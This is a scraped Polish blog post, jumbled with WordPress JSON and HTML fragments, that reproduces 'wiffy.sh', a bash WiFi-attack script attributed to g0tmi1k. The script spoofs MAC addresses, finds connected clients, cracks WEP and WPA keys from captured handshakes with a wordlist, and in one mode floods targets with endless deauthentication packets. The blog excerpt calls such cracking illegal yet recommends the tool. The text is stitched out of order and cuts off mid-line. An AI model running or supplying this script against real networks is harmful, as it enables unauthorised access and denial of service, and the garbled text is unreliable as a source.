\"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0011.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install 